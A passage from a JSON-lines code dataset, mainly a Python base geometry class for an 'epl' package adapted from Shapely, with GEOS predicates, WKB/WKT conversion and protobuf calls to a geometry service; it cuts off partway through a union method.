convert -page A4 <png> -resize 100 <ps>\n # Not sure if \"page\" flag is appropriate at this stage but it\n # may make margins in the SVG unnecessary.\n\n # 2014: Unfortunately PostScript stopped working at some point.\n # evince says \"assertion 'EV_IS_DOCUMENT (document)' failed\"\n # when opening the PostScript file, which lp prints at\n # drastically reduced size.\n\n # Printing PNG in GIMP respects scale, (with and?) without the\n # margins. Perhaps this can be scripted. Apparently,\n # rasterization in GIMP can be scripted.\n # http://porpoisehead.net/mysw/index.php?pgid=gimp_svg\n","repo_name":"veikman/cbg","sub_path":"cbg/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":20342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43103315506","text":"\"\"\"Base geometry class and utilities\n\nNote: a third, z, coordinate value may be used when constructing\ngeometry objects, but has no effect on geometric analysis. All\noperations are performed in the x-y plane. Thus, geometries with\ndifferent z values may intersect or be equal.\n\"\"\"\nfrom __future__ import annotations\n\nimport importlib\nimport random\n\nfrom binascii import a2b_hex\nfrom ctypes import pointer, c_size_t, c_char_p, c_void_p\nimport sys\nfrom warnings import warn\nfrom functools import wraps\n\nfrom typing import Iterable, Iterator\n\nfrom epl.protobuf.v1.geometry_pb2 import ProjectionData\nfrom shapely.coords import CoordinateSequence\nfrom shapely.geos import WKBWriter, WKTWriter\nfrom shapely.geos import lgeos\nfrom shapely.impl import DefaultImplementation, delegated\nfrom epl.protobuf.v1 import geometry_pb2\nfrom epl import geometry as geometry_init\nfrom shapely.wkb import loads as shapely_loads_wkb\n\ninteger_types = (int,)\n\ntry:\n import numpy as np\n\n integer_types = integer_types + (np.integer,)\nexcept ImportError:\n pass\n\nGEOMETRY_TYPES = [\n 'Point',\n 'LineString',\n 'LinearRing',\n 'Polygon',\n 'MultiPoint',\n 'MultiLineString',\n 'MultiPolygon',\n 'GeometryCollection',\n]\n\nGEOMETRY_MODULES = {\n 'Point': 'epl.geometry.point',\n 'LineString': 'epl.geometry.linestring',\n 'LinearRing': 'epl.geometry.polygon',\n 'Polygon': 'epl.geometry.polygon',\n 'MultiPoint': 'epl.geometry.multipoint',\n 'MultiLineString': 'epl.geometry.multilinestring',\n 'MultiPolygon': 'epl.geometry.multipolygon',\n 'GeometryCollection': 'epl.geometry.collection'\n}\n\nRESULT_ENCODING = geometry_pb2.EWKB\n\ndef dump_coords(geom):\n \"\"\"Dump coordinates of a geometry in the same order as data packing\"\"\"\n if not isinstance(geom, BaseGeometry):\n raise ValueError('Must be instance of a geometry class; found ' +\n geom.__class__.__name__)\n elif geom.type in ('Point', 'LineString', 'LinearRing'):\n return geom.coords[:]\n elif geom.type == 'Polygon':\n return geom.exterior.coords[:] + [i.coords[:] for i in geom.interiors]\n elif geom.type.startswith('Multi') or geom.type == 'GeometryCollection':\n # Recursive call\n return [dump_coords(part) for part in geom]\n else:\n raise ValueError('Unhandled geometry type: ' + repr(geom.type))\n\n\ndef geometry_type_name(g):\n if g is None:\n raise ValueError(\"Null geometry has no type\")\n return GEOMETRY_TYPES[lgeos.GEOSGeomTypeId(g)]\n\n\ndef geom_factory(g,\n parent=None,\n proj: geometry_pb2.ProjectionData = None):\n # Abstract geometry factory for use with topological methods below\n if not g:\n raise ValueError(\"No Shapely geometry can be created from null value\")\n ob = BaseGeometry(proj=proj)\n geom_type = geometry_type_name(g)\n # TODO: check cost of dynamic import by profiling\n\n mod = importlib.import_module(name=GEOMETRY_MODULES[geom_type])\n ob.__class__ = getattr(mod, geom_type)\n ob._geom = g\n ob.__p__ = parent\n if lgeos.methods['has_z'](g):\n ob._ndim = 3\n else:\n ob._ndim = 2\n ob._is_empty = False\n return ob\n\n\n# def geom_from_wkt(data, proj: geometry_pb2.ProjectionData):\n# warnings.warn(\"`geom_from_wkt` is deprecated. Use `geos.wkt_reader.read(data)`.\", DeprecationWarning)\n# if sys.version_info[0] >= 3:\n# data = data.encode('ascii')\n# geom = lgeos.GEOSGeomFromWKT(c_char_p(data))\n# if not geom:\n# raise ValueError(\n# \"Could not create geometry because of errors while reading input.\")\n# return geom_factory(geom, proj=proj)\n\n\ndef geom_to_wkt(ob):\n warn(\"`geom_to_wkt` is deprecated. Use `geos.wkt_writer.write(ob)`.\", DeprecationWarning)\n if ob is None or ob._geom is None:\n raise ValueError(\"Null geometry supports no operations\")\n return lgeos.GEOSGeomToWKT(ob._geom)\n\n\ndef deserialize_wkb(data):\n geom = lgeos.GEOSGeomFromWKB_buf(c_char_p(data), c_size_t(len(data)))\n if not geom:\n raise ValueError(\n \"Could not create geometry because of errors while reading input.\")\n return geom\n\n\n# def geom_from_wkb(data):\n# warn(\"`geom_from_wkb` is deprecated. Use `geos.wkb_reader.read(data)`.\",\n# DeprecationWarning)\n# return geom_factory(deserialize_wkb(data))\n\n\ndef geom_to_wkb(ob):\n warn(\"`geom_to_wkb` is deprecated. Use `geos.wkb_writer.write(ob)`.\",\n DeprecationWarning)\n if ob is None or ob._geom is None:\n raise ValueError(\"Null geometry supports no operations\")\n size = c_size_t()\n return lgeos.GEOSGeomToWKB_buf(c_void_p(ob._geom), pointer(size))\n\n\ndef geos_geom_from_py(ob, create_func=None):\n \"\"\"Helper function for geos_*_from_py functions in each geom type.\n If a create_func is specified the coodinate sequence is cloned and a new\n geometry is created with it, otherwise the geometry is cloned directly.\n This behaviour is useful for converting between LineString and LinearRing\n objects.\n \"\"\"\n if create_func is None:\n geom = lgeos.GEOSGeom_clone(ob._geom)\n else:\n cs = lgeos.GEOSGeom_getCoordSeq(ob._geom)\n cs = lgeos.GEOSCoordSeq_clone(cs)\n geom = create_func(cs)\n\n N = ob._ndim\n\n return geom, N\n\n\ndef exceptNull(func):\n \"\"\"Decorator which helps avoid GEOS operations on null pointers.\"\"\"\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n if not args[0]._geom or args[0].is_empty:\n raise ValueError(\"Null/empty geometry supports no operations\")\n return func(*args, **kwargs)\n\n return wrapper\n\n\nclass CAP_STYLE(object):\n round = 1\n flat = 2\n square = 3\n\n\nclass JOIN_STYLE(object):\n round = 1\n mitre = 2\n bevel = 3\n\n\nEMPTY = deserialize_wkb(a2b_hex(b'010700000000000000'))\n\n\nclass BaseGeometry(object):\n \"\"\"\n Provides GEOS spatial predicates and topological operations.\n\n \"\"\"\n\n # Attributes\n # ----------\n # __geom__ : c_void_p\n # Cached ctypes pointer to GEOS geometry. Not to be accessed.\n # _geom : c_void_p\n # Property by which the GEOS geometry is accessed.\n # __p__ : object\n # Parent (Shapely) geometry\n # _ctypes_data : object\n # Cached ctypes data buffer\n # _ndim : int\n # Number of dimensions (2 or 3, generally)\n # _crs : object\n # Coordinate reference system. Available for Shapely extensions, but\n # not implemented here.\n # _other_owned : bool\n # True if this object's GEOS geometry is owned by another as in the\n # case of a multipart geometry member.\n __geom__ = EMPTY\n __p__ = None\n _ctypes_data = None\n _ndim = None\n _crs = None\n _other_owned = False\n _is_empty = True\n\n # Backend config\n impl = DefaultImplementation\n\n # a reference to the so/dll proxy to preserve access during clean up\n _lgeos = lgeos\n\n def __init__(self,\n proj: geometry_pb2.ProjectionData,\n epsg: int = 0,\n proj4: str = \"\"):\n self._proj = get_proj(proj=proj, epsg=epsg, proj4=proj4)\n\n def empty(self, val=EMPTY):\n # TODO: defer cleanup to the implementation. We shouldn't be\n # explicitly calling a lgeos method here.\n if not self._is_empty and not self._other_owned and self.__geom__:\n try:\n self._lgeos.GEOSGeom_destroy(self.__geom__)\n except (AttributeError, TypeError):\n pass # _lgeos might be empty on shutdown\n self._is_empty = True\n self.__geom__ = val\n\n def __del__(self):\n self.empty(val=None)\n self.__p__ = None\n self._proj = None\n\n def __str__(self):\n return \"{0} {1}\".format(self.wkt, str(self.proj))\n\n # To support pickling\n def __reduce__(self):\n return self.__class__, (), self.wkb\n\n # TODO, does this get called anywhere?\n def __setstate__(self, state):\n self.empty()\n self.__geom__ = deserialize_wkb(state)\n self._is_empty = False\n if lgeos.methods['has_z'](self.__geom__):\n self._ndim = 3\n else:\n self._ndim = 2\n\n @property\n def _geom(self):\n return self.__geom__\n\n @_geom.setter\n def _geom(self, val):\n self.empty()\n self._is_empty = val in [EMPTY, None]\n self.__geom__ = val\n\n # Operators\n # ---------\n\n def __and__(self, other):\n return self.intersection(other)\n\n def __or__(self, other):\n return self.union(other)\n\n def __sub__(self, other):\n return self.difference(other)\n\n def __xor__(self, other):\n return self.symmetric_difference(other)\n\n def __eq__(self, other):\n return (\n type(other) == type(self) and\n tuple(self.coords) == tuple(other.coords) and\n self.proj_eq(other.proj)\n )\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n __hash__ = None\n\n def proj_eq(self, other_proj: geometry_pb2.ProjectionData):\n return proj_eq(self.proj, other_proj)\n\n # Array and ctypes interfaces\n # ---------------------------\n\n @property\n def ctypes(self):\n \"\"\"Return ctypes buffer\"\"\"\n raise NotImplementedError\n\n @property\n def array_interface_base(self):\n if sys.byteorder == 'little':\n typestr = '<f8'\n elif sys.byteorder == 'big':\n typestr = '>f8'\n else:\n raise ValueError(\n \"Unsupported byteorder: neither little nor big-endian\")\n return {\n 'version': 3,\n 'typestr': typestr,\n 'data': self.ctypes,\n }\n\n @property\n def __array_interface__(self):\n \"\"\"Provide the Numpy array protocol.\"\"\"\n raise NotImplementedError\n\n # Coordinate access\n # -----------------\n\n def _get_coords(self):\n \"\"\"Access to geometry's coordinates (CoordinateSequence)\"\"\"\n if self.is_empty:\n return []\n return CoordinateSequence(self)\n\n def _set_coords(self, ob):\n raise NotImplementedError(\n \"set_coords must be provided by derived classes\")\n\n coords = property(_get_coords, _set_coords)\n\n @property\n def xy(self):\n \"\"\"Separate arrays of X and Y coordinate values\"\"\"\n raise NotImplementedError\n\n # Python feature protocol\n\n @property\n def __geo_interface__(self):\n \"\"\"Dictionary representation of the geometry\"\"\"\n raise NotImplementedError\n\n # Type of geometry and its representations\n # ----------------------------------------\n\n def geometryType(self):\n return geometry_type_name(self._geom)\n\n @property\n def type(self):\n return self.geometryType()\n\n def to_wkb(self):\n warn(\"`to_wkb` is deprecated. Use the `wkb` property.\",\n DeprecationWarning)\n return geom_to_wkb(self)\n\n def to_wkt(self):\n warn(\"`to_wkt` is deprecated. Use the `wkt` property.\",\n DeprecationWarning)\n return geom_to_wkt(self)\n\n @property\n def wkt(self):\n \"\"\"WKT representation of the geometry\"\"\"\n return WKTWriter(lgeos).write(self)\n\n @property\n def wkb(self):\n \"\"\"WKB representation of the geometry\"\"\"\n return WKBWriter(lgeos).write(self)\n\n @property\n def wkb_hex(self):\n \"\"\"WKB hex representation of the geometry\"\"\"\n return WKBWriter(lgeos).write_hex(self)\n\n def svg(self, scale_factor=1., **kwargs):\n \"\"\"Raises NotImplementedError\"\"\"\n raise NotImplementedError\n\n def _repr_svg_(self):\n \"\"\"SVG representation for iPython notebook\"\"\"\n svg_top = '<svg xmlns=\"http://www.w3.org/2000/svg\" ' \\\n 'xmlns:xlink=\"http://www.w3.org/1999/xlink\" '\n if self.is_empty:\n return svg_top + '/>'\n else:\n # Establish SVG canvas that will fit all the data + small space\n xmin, ymin, xmax, ymax = self.bounds\n if xmin == xmax and ymin == ymax:\n # This is a point; buffer using an arbitrary size\n xmin, ymin, xmax, ymax = self.s_buffer(1).bounds\n else:\n # Expand bounds by a fraction of the data ranges\n expand = 0.04 # or 4%, same as R plots\n widest_part = max([xmax - xmin, ymax - ymin])\n expand_amount = widest_part * expand\n xmin -= expand_amount\n ymin -= expand_amount\n xmax += expand_amount\n ymax += expand_amount\n dx = xmax - xmin\n dy = ymax - ymin\n width = min([max([100., dx]), 300])\n height = min([max([100., dy]), 300])\n try:\n scale_factor = max([dx, dy]) / max([width, height])\n except ZeroDivisionError:\n scale_factor = 1.\n view_box = \"{} {} {} {}\".format(xmin, ymin, dx, dy)\n transform = \"matrix(1,0,0,-1,0,{})\".format(ymax + ymin)\n return svg_top + (\n 'width=\"{1}\" height=\"{2}\" viewBox=\"{0}\" '\n 'preserveAspectRatio=\"xMinYMin meet\">'\n '<g transform=\"{3}\">{4}</g></svg>'\n ).format(view_box, width, height, transform,\n self.svg(scale_factor))\n\n @property\n def geom_type(self):\n \"\"\"Name of the geometry's type, such as 'Point'\"\"\"\n return self.geometryType()\n\n # Real-valued properties and methods\n # ----------------------------------\n\n @property\n def s_area(self):\n \"\"\"Unitless area of the geometry (float)\"\"\"\n return self.impl['area'](self)\n\n def s_distance(self, other):\n \"\"\"Unitless distance to other geometry (float)\"\"\"\n return self.impl['distance'](self, other)\n\n def s_hausdorff_distance(self, other):\n \"\"\"Unitless hausdorff distance to other geometry (float)\"\"\"\n return self.impl['hausdorff_distance'](self, other)\n\n @property\n def s_length(self):\n \"\"\"Unitless length of the geometry (float)\"\"\"\n return self.impl['length'](self)\n\n # Topological properties\n # ----------------------\n\n @property\n def boundary(self):\n \"\"\"\n Returns a lower dimension geometry that bounds the object\n\n The boundary of a polygon is a line, the boundary of a line is a\n collection of points. The boundary of a point is an empty (null)\n collection.\n \"\"\"\n return geom_factory(self.impl['boundary'](self), proj=self.proj)\n\n @property\n def bounds(self):\n \"\"\"Returns minimum bounding region (minx, miny, maxx, maxy)\"\"\"\n if self.is_empty:\n return ()\n else:\n return self.impl['bounds'](self)\n\n @property\n def centroid(self):\n \"\"\"Returns the geometric center of the object\"\"\"\n return geom_factory(self.impl['centroid'](self), proj=self.proj)\n\n @delegated\n def representative_point(self):\n \"\"\"Returns a point guaranteed to be within the object, cheaply.\"\"\"\n return geom_factory(self.impl['representative_point'](self), proj=self.proj)\n\n @property\n def s_convex_hull(self):\n \"\"\"Imagine an elastic band stretched around the geometry: that's a\n convex hull, more or less\n\n The convex hull of a three member multipoint, for example, is a\n triangular polygon.\n \"\"\"\n return geom_factory(self.impl['convex_hull'](self), proj=self.proj)\n\n @property\n def envelope(self):\n \"\"\"A figure that envelopes the geometry\"\"\"\n return geom_factory(self.impl['envelope'](self), proj=self.proj)\n\n def s_buffer(self, distance, resolution=16, quadsegs=None,\n cap_style=CAP_STYLE.round, join_style=JOIN_STYLE.round,\n mitre_limit=5.0):\n \"\"\"Returns a geometry with an envelope at a distance from the object's\n envelope\n\n A negative distance has a \"shrink\" effect. A zero distance may be used\n to \"tidy\" a polygon. The resolution of the buffer around each vertex of\n the object increases by increasing the resolution keyword parameter\n or second positional parameter. Note: the use of a `quadsegs` parameter\n is deprecated and will be gone from the next major release.\n\n The styles of caps are: CAP_STYLE.round (1), CAP_STYLE.flat (2), and\n CAP_STYLE.square (3).\n\n The styles of joins between offset segments are: JOIN_STYLE.round (1),\n JOIN_STYLE.mitre (2), and JOIN_STYLE.bevel (3).\n\n The mitre limit ratio is used for very sharp corners. The mitre ratio\n is the ratio of the distance from the corner to the end of the mitred\n offset corner. When two line segments meet at a sharp angle, a miter\n join will extend the original geometry. To prevent unreasonable\n geometry, the mitre limit allows controlling the maximum length of the\n join corner. Corners with a ratio which exceed the limit will be\n beveled.\n\n Example:\n\n >>> from shapely.wkt import loads\n >>> g = loads('POINT (0.0 0.0)')\n >>> g.buffer(1.0).area # 16-gon approx of a unit radius circle\n 3.1365484905459389\n >>> g.buffer(1.0, 128).area # 128-gon approximation\n 3.1415138011443009\n >>> g.buffer(1.0, 3).area # triangle approximation\n 3.0\n >>> list(g.buffer(1.0, cap_style='square').exterior.coords)\n [(1.0, 1.0), (1.0, -1.0), (-1.0, -1.0), (-1.0, 1.0), (1.0, 1.0)]\n >>> g.buffer(1.0, cap_style='square').area\n 4.0\n \"\"\"\n if quadsegs is not None:\n warn(\n \"The `quadsegs` argument is deprecated. Use `resolution`.\", DeprecationWarning, stacklevel=2)\n res = quadsegs\n else:\n res = resolution\n if mitre_limit == 0.0:\n raise ValueError(\n 'Cannot compute offset from zero-length line segment')\n if cap_style == CAP_STYLE.round and join_style == JOIN_STYLE.round:\n return geom_factory(self.impl['buffer'](self, distance, res), proj=self.proj)\n\n if 'buffer_with_style' not in self.impl:\n raise NotImplementedError(\"Styled buffering not available for \"\n \"GEOS versions < 3.2.\")\n\n return geom_factory(self.impl['buffer_with_style'](self, distance, res,\n cap_style,\n join_style,\n mitre_limit), proj=self.proj)\n\n @delegated\n def s_simplify(self, tolerance, preserve_topology=True):\n \"\"\"Returns a simplified geometry produced by the Douglas-Peucker\n algorithm\n\n Coordinates of the simplified geometry will be no more than the\n tolerance distance from the original. Unless the topology preserving\n option is used, the algorithm may produce self-intersecting or\n otherwise invalid geometries.\n \"\"\"\n if preserve_topology:\n op = self.impl['topology_preserve_simplify']\n else:\n op = self.impl['simplify']\n return geom_factory(op(self, tolerance), proj=self.proj)\n\n # Binary operations\n # -----------------\n\n def s_difference(self, other):\n \"\"\"Returns the difference of the geometries\"\"\"\n return geom_factory(self.impl['difference'](self, other), proj=self.proj)\n\n def s_intersection(self, other):\n \"\"\"Returns the intersection of the geometries\"\"\"\n return geom_factory(self.impl['intersection'](self, other), proj=self.proj)\n\n def s_symmetric_difference(self, other):\n \"\"\"Returns the symmetric difference of the geometries\n (Shapely geometry)\"\"\"\n return geom_factory(self.impl['symmetric_difference'](self, other), proj=self.proj)\n\n def s_union(self, other):\n \"\"\"Returns the union of the geometries (Shapely geometry)\"\"\"\n return geom_factory(self.impl['union'](self, other), proj=self.proj)\n\n # Unary predicates\n # ----------------\n\n @property\n def has_z(self):\n \"\"\"True if the geometry's coordinate sequence(s) have z values (are\n 3-dimensional)\"\"\"\n return bool(self.impl['has_z'](self))\n\n @property\n def is_empty(self):\n \"\"\"True if the set of points in this geometry is empty, else False\"\"\"\n return (self._geom is None) or bool(self.impl['is_empty'](self))\n\n @property\n def is_ring(self):\n \"\"\"True if the geometry is a closed ring, else False\"\"\"\n return bool(self.impl['is_ring'](self))\n\n @property\n def is_closed(self):\n \"\"\"True if the geometry is closed, else False\n\n Applicable only to 1-D geometries.\"\"\"\n if self.geom_type == 'LinearRing':\n return True\n elif self.geom_type == 'LineString':\n if 'is_closed' in self.impl:\n return bool(self.impl['is_closed'](self))\n else:\n return self.coords[0] == self.coords[-1]\n else:\n return False\n\n @property\n def s_is_simple(self):\n \"\"\"True if the geometry is simple, meaning that any self-intersections\n are only at boundary points, else False\"\"\"\n return bool(self.impl['is_simple'](self))\n\n @property\n def s_is_valid(self):\n \"\"\"True if the geometry is valid (definition depends on sub-class),\n else False\"\"\"\n return bool(self.impl['is_valid'](self))\n\n # Binary predicates\n # -----------------\n\n def s_relate(self, other):\n \"\"\"Returns the DE-9IM intersection matrix for the two geometries\n (string)\"\"\"\n return self.impl['relate'](self, other)\n\n def s_covers(self, other):\n \"\"\"Returns True if the geometry covers the other, else False\"\"\"\n return bool(self.impl['covers'](self, other))\n\n def s_contains(self, other):\n \"\"\"Returns True if the geometry contains the other, else False\"\"\"\n return bool(self.impl['contains'](self, other))\n\n def s_crosses(self, other):\n \"\"\"Returns True if the geometries cross, else False\"\"\"\n return bool(self.impl['crosses'](self, other))\n\n def s_disjoint(self, other):\n \"\"\"Returns True if geometries are disjoint, else False\"\"\"\n return bool(self.impl['disjoint'](self, other))\n\n def s_equals(self, other):\n \"\"\"Returns True if geometries are equal, else False\n\n Refers to point-set equality (or topological equality), and is equivalent to\n (self.within(other) & self.contains(other))\n \"\"\"\n return bool(self.impl['equals'](self, other))\n\n def s_intersects(self, other):\n \"\"\"Returns True if geometries intersect, else False\"\"\"\n return bool(self.impl['intersects'](self, other))\n\n def s_overlaps(self, other):\n \"\"\"Returns True if geometries overlap, else False\"\"\"\n return bool(self.impl['overlaps'](self, other))\n\n def s_touches(self, other):\n \"\"\"Returns True if geometries touch, else False\"\"\"\n return bool(self.impl['touches'](self, other))\n\n def s_within(self, other):\n \"\"\"Returns True if geometry is within the other, else False\"\"\"\n return bool(self.impl['within'](self, other))\n\n def s_equals_exact(self, other, tolerance):\n \"\"\"Returns True if geometries are equal to within a specified\n tolerance\n\n Refers to coordinate equality, which requires coordinates to be equal\n and in the same order for all components of a geometry\n \"\"\"\n return bool(self.impl['equals_exact'](self, other, tolerance))\n\n def s_almost_equals(self, other, decimal=6):\n \"\"\"Returns True if geometries are equal at all coordinates to a\n specified decimal place\n\n Refers to approximate coordinate equality, which requires coordinates be\n approximately equal and in the same order for all components of a geometry.\n \"\"\"\n return self.s_equals_exact(other, 0.5 * 10 ** (-decimal))\n\n def s_relate_pattern(self, other, pattern):\n \"\"\"Returns True if the DE-9IM string code for the relationship between\n the geometries satisfies the pattern, else False\"\"\"\n pattern = c_char_p(pattern.encode('ascii'))\n return bool(self.impl['relate_pattern'](self, other, pattern))\n\n # Linear referencing\n # ------------------\n\n @delegated\n def s_project(self, other, normalized=False):\n \"\"\"Returns the distance along this geometry to a point nearest the\n specified point\n\n If the normalized arg is True, return the distance normalized to the\n length of the linear geometry.\n \"\"\"\n if normalized:\n op = self.impl['project_normalized']\n else:\n op = self.impl['project']\n return op(self, other)\n\n @delegated\n @exceptNull\n def interpolate(self, distance, normalized=False):\n \"\"\"Return a point at the specified distance along a linear geometry\n\n Negative length values are taken as measured in the reverse\n direction from the end of the geometry. Out-of-range index\n values are handled by clamping them to the valid range of values.\n If the normalized arg is True, the distance will be interpreted as a\n fraction of the geometry's length.\n \"\"\"\n if normalized:\n op = self.impl['interpolate_normalized']\n else:\n op = self.impl['interpolate']\n return geom_factory(op(self, distance))\n\n @property\n def proj(self):\n return self._proj\n\n def set_epsg(self, value):\n self._proj = ProjectionData(epsg=value)\n\n @staticmethod\n def import_protobuf(geometry_data: geometry_pb2.GeometryData):\n \"\"\"\n import the geometry protobuf into a shapely geometry\n :param geometry_data: geometry_pb2.GeometryData with spatial reference defined\n :return: epl.BaseGeometry\n \"\"\"\n rpc_reader = RPCReader(lgeos, geometry_data)\n return rpc_reader.read()\n\n @staticmethod\n def from_envelope_data(envelope_data: geometry_pb2.EnvelopeData):\n pass\n\n @staticmethod\n def import_wkt(wkt: str, proj: geometry_pb2.ProjectionData = None, epsg: int = 0, proj4: str = \"\"):\n # TODO. this is messy. should be using RPCReader for this\n proj = get_proj(proj=proj, epsg=epsg, proj4=proj4)\n return BaseGeometry.import_protobuf(geometry_pb2.GeometryData(wkt=wkt, proj=proj))\n\n @staticmethod\n def import_wkb(wkb: bytes, proj: geometry_pb2.ProjectionData = None, epsg: int = 0, proj4: str = \"\"):\n # TODO. this is messy. should be using RPCReader for this\n proj = get_proj(proj=proj, epsg=epsg, proj4=proj4)\n return BaseGeometry.import_protobuf(geometry_pb2.GeometryData(ewkb=wkb, proj=proj))\n\n @staticmethod\n def _spat_ref_create(epsg: int = 0, proj4: str = \"\"):\n if epsg > 0:\n return geometry_pb2.ProjectionData(epsg=epsg)\n elif len(proj4) > 0:\n return geometry_pb2.ProjectionData(proj4=proj4)\n return None\n\n def buffer(self, distance: float, geodetic=True):\n \"\"\"\n buffer a geometry by distance. defaults to buffering the geometry in meters using Lambert Azimuthal Equal Area\n :param distance: distance in meters to buffer. If geodetic is set to false, buffers by the unit of the geometry\n provided (for instance, if wgs84, the buffer unit is degrees)\n :param geodetic: default to true. set to false if you want to buffer a geometry in it's native unit and not\n geodetic in meters\n :return: buffered geometry in spatial reference of input\n \"\"\"\n if geodetic:\n return self.geodetic_buffer(distance_m=distance)\n op_request = geometry_pb2.GeometryRequest(geometry=self.geometry_data,\n operator=geometry_pb2.BUFFER,\n buffer_params=geometry_pb2.Params.Buffer(\n distance=distance),\n result_encoding=RESULT_ENCODING)\n\n geometry_response = geometry_init.geometry_service.operate(op_request)\n return BaseGeometry.import_protobuf(geometry_response.geometry)\n\n def project(self, to_proj: geometry_pb2.ProjectionData = None, to_epsg: int = 0, to_proj4: str = \"\"):\n to_proj = get_proj(proj=to_proj, epsg=to_epsg, proj4=to_proj4)\n if proj_eq(self.proj, to_proj):\n # notice, no copy made here, whereas, project always copies the data\n return self\n\n op_request = geometry_pb2.GeometryRequest(geometry=self.geometry_data,\n operator=geometry_pb2.PROJECT,\n result_proj=to_proj,\n result_encoding=RESULT_ENCODING)\n geometry_response = geometry_init.geometry_service.operate(op_request)\n return BaseGeometry.import_protobuf(geometry_response.geometry)\n\n def simplify(self):\n op_request = geometry_pb2.GeometryRequest(geometry=self.geometry_data,\n operator=geometry_pb2.SIMPLIFY,\n result_encoding=RESULT_ENCODING)\n geometry_response = geometry_init.geometry_service.operate(op_request)\n return BaseGeometry.import_protobuf(geometry_response.geometry)\n\n def convex(self):\n op_request = geometry_pb2.GeometryRequest(geometry=self.geometry_data,\n operator=geometry_pb2.CONVEX_HULL,\n result_encoding=RESULT_ENCODING)\n geometry_response = geometry_init.geometry_service.operate(op_request)\n return BaseGeometry.import_protobuf(geometry_response.geometry)\n\n def densify(self, max_length_m: float, geodetic=True, result_proj: geometry_pb2.ProjectionData = None):\n \"\"\"\nDensify a polyline or polygon by the max_length in meters. No segment will be larger than the max_length. If geodetic is set to true the densification will use the geodesic midpoint from Rapp\n Args:\n max_length_m: the maximum length of a segment.\n geodetic: bool, if true densify considers curvature of ellipsoid\n result_proj: projection for results (otherwise uses projection of input)\n\n Returns: densified geometry\n\n \"\"\"\n if self.geom_type != 'Polygon' and self.geom_type != 'LineString':\n raise ValueError(\"only polygon or polylines\")\n\n params = geometry_pb2.Params.Densify(max_length=max_length_m)\n operator_type = geometry_pb2.GEODETIC_DENSIFY_BY_LENGTH\n if not geodetic:\n operator_type = geometry_pb2.DENSIFY_BY_LENGTH\n op_request = geometry_pb2.GeometryRequest(geometry=self.geometry_data,\n operator=operator_type,\n densify_params=params,\n result_proj=result_proj,\n result_encoding=RESULT_ENCODING)\n geometry_response = geometry_init.geometry_service.operate(op_request)\n return BaseGeometry.import_protobuf(geometry_response.geometry)\n\n def area(self, geodetic=True):\n \"\"\"\n get the area of the polygon, defaults to geodetic area.\n :param geodetic:\n :return:\n \"\"\"\n if geodetic:\n return self.geodetic_area()\n return self.s_area\n\n def geodetic_area(self):\n \"\"\"\n get the geodesic area of a polygon.\n :return: double value that is the WGS84 area of the geometry\n \"\"\"\n op_area = geometry_pb2.GeometryRequest(geometry=self.geometry_data,\n operator=geometry_pb2.GEODETIC_AREA,\n result_proj=geometry_pb2.ProjectionData(epsg=4326),\n result_encoding=RESULT_ENCODING)\n area_response = geometry_init.geometry_service.operate(op_area)\n return area_response.measure\n\n def distance(self, other_geom: BaseGeometry, geodetic=True):\n if geodetic:\n return self.geodetic_distance(other_geom=other_geom)\n return self.s_distance(other_geom)\n\n def geodetic_distance(self, other_geom: BaseGeometry):\n # TODO, requires proper implementation in Geometry Service\n centroid = self.union(other_geom, result_proj=geometry_pb2.ProjectionData(epsg=4326)).centroid\n local_proj = geometry_pb2.ProjectionData(\n custom=geometry_pb2.ProjectionData.Custom(lon_0=centroid.x,\n lat_0=centroid.y))\n\n op_distance = geometry_pb2.GeometryRequest(left_geometry=self.geometry_data,\n right_geometry=other_geom.geometry_data,\n operator=geometry_pb2.DISTANCE,\n operation_proj=local_proj,\n result_encoding=RESULT_ENCODING)\n distance_response = geometry_init.geometry_service.operate(op_distance)\n return distance_response.measure\n\n def geodetic_buffer(self, distance_m):\n op_request = geometry_pb2.GeometryRequest(geometry=self.geometry_data,\n operator=geometry_pb2.GEODESIC_BUFFER,\n buffer_params=geometry_pb2.Params.Buffer(\n distance=distance_m),\n result_encoding=RESULT_ENCODING)\n\n geometry_response = geometry_init.geometry_service.operate(op_request)\n return BaseGeometry.import_protobuf(geometry_response.geometry)\n\n def symmetric_difference(self,\n other_geom: BaseGeometry,\n operation_proj: geometry_pb2.ProjectionData = None,\n result_proj: geometry_pb2.ProjectionData = None):\n return self._two_geom_op(other_geom=other_geom,\n operator_type=geometry_pb2.SYMMETRIC_DIFFERENCE,\n operation_proj=operation_proj,\n result_proj=result_proj)\n\n def difference(self,\n other_geom: BaseGeometry,\n operation_proj: geometry_pb2.ProjectionData = None,\n result_proj: geometry_pb2.ProjectionData = None):\n return self._two_geom_op(other_geom=other_geom,\n operator_type=geometry_pb2.DIFFERENCE,\n operation_proj=operation_proj,\n result_proj=result_proj)\n\n def intersection(self,\n other_geom: BaseGeometry,\n operation_proj: geometry_pb2.ProjectionData = None,\n result_proj: geometry_pb2.ProjectionData = None):\n \"\"\"\n get the intersecting geometry. if the geometries intersected are in different spatial references, you'll need\n to define a result spatial reference for them both to be projected into. That result spatial reference will be\n the operation spatial reference. If you want their intersection to be in a different spatial reference than the\n results, you can define that as well\n :param other_geom: other geometry to be intersected\n :param operation_proj: the spatial reference both geometries should be projected into for the intersection operation\n :param result_proj: the resulting spatial reference of the output geometry\n :return:\n \"\"\"\n return self._two_geom_op(other_geom=other_geom,\n operator_type=geometry_pb2.INTERSECTION,\n operation_proj=operation_proj,\n result_proj=result_proj)\n\n def random_multipoint(self,\n points_per_square_km: float,\n seed=None,\n result_proj: geometry_pb2.ProjectionData = None):\n \"\"\"\nCreate a multipoint geometry where all points exist within the input polygon. Points are calculated on an equal area geometry\n Args:\n points_per_square_km: desired average points per square kilometer\n seed: mersenne seed\n result_proj: if projection is desired\n\n Returns: multipoint\n\n \"\"\"\n if self.geom_type != 'Polygon' and self.geom_type != 'MultiPolygon':\n raise ValueError('only implemented for Polygon')\n\n if seed is None:\n seed = random.randint(0, 20000000)\n print(\"generated seed {}\".format(seed))\n\n params = geometry_pb2.Params.RandomPoints(seed=seed,\n points_per_square_km=points_per_square_km)\n op_request = geometry_pb2.GeometryRequest(geometry=self.geometry_data,\n operator=geometry_pb2.RANDOM_POINTS,\n random_points_params=params,\n result_proj=result_proj,\n result_encoding=RESULT_ENCODING)\n\n geometry_response = geometry_init.geometry_service.operate(op_request)\n return BaseGeometry.import_protobuf(geometry_response.geometry)\n\n def union(self,\n other_geom: BaseGeometry,\n operation_proj: 